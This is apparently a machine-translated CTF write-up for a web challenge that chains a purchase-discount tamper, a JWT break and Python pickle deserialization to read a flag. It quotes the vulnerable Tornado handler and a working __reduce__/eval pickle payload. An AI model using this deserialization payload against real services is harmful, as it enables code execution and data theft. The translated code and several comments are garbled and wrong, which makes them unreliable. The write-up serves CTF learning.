step:
Find out lv6 purchase, modification discount buy lv6; then find admin login screen, JWT break, landing admin; click the button to become a large membership, use python read flag deserialization vulnerability
Resolution:
This question chefs of WP very detailed, I would record myself do not understand the point
pickle Import
Import urllib
class AdminHandler (BaseHandler):
@ tornado.web.authenticated
DEF GET (Self, * args, ** kwargs):
IF self.current_user == "ADMIN":
return self.render ( 'form.html', = RES 'This IS Black Technology!', Member = 0)
the else:
return self.render ( 'no_ass.html')
@ tornado.web.authenticated
DEF POST (Self, * args, ** kwargs):
the try:
Become = self.get_argument ( 'Become')
# the pickle provides a simple persistence function. Objects can be stored as a file on disk.
# #
# # Pickle module can only be used in python, almost all of the data types (lists, dictionaries, sets, etc.) can be used in the python pickle serializes
# #
# # The pickle serialized data, poor readability, people are generally not recognized.
The pickle.loads = P (urllib.unquote (Become))
# urllib.unquote: the parameters stored in the dictionary to encode the URL query string, i.e. converted to key1 = value1 & key2 = value2 form
# pickle.loads (bytes_object ): byte read from the packaged objects, and returns the
return self.render ( 'form.html', RES = P, = Member. 1)
the except:
return self.render ( 'form.html', RES = 'This is Black Technology!', member = 0)
payload [become generated parameters to the environment at PY2]:
import pickle
import urllib
class payload(object):
def __reduce__(self):
return (eval, ("open('/flag.txt','r').read()",))
# __reduce__:当定义扩展类型时(也就是使用Python的C语言API实现的类型),如果你想pickle它们,你必须告诉Python如何pickle它们。
# __reduce__ 被定义之后,当对象被Pickle时就会被调用。
# 它要么返回一个代表全局名称的字符串,Pyhton会查找它并pickle,要么返回一个元组。
# 这个元组包含2到5个元素,其中包括:
# 一个可调用的对象,用于重建对象时调用;【我们这里的eval】
# 一个参数元素,供那个可调用对象使用; 【我们这里的open('/flag.txt','r').read()】
# 被传递给 __setstate__ 的状态(可选);
# 一个产生被pickle的列表元素的迭代器(可选);
# 一个产生被pickle的字典元素的迭代器(可选)
a = pickle.dumps(payload())
# pickle.dumps(obj):以字节对象形式返回封装的对象,不需要写入文件中
a = urllib.quote(a)
print a
详细走链接:
https://www.zhaoj.in/read-5946.html
https://blog.csdn.net/weixin_43345082/article/details/97817909
https://blog.csdn.net/weixin_43411585/article/details/88854544
https://blog.csdn.net/wf592523813/article/details/79141463
https://www.cnblogs.com/lincappu/p/8296078.html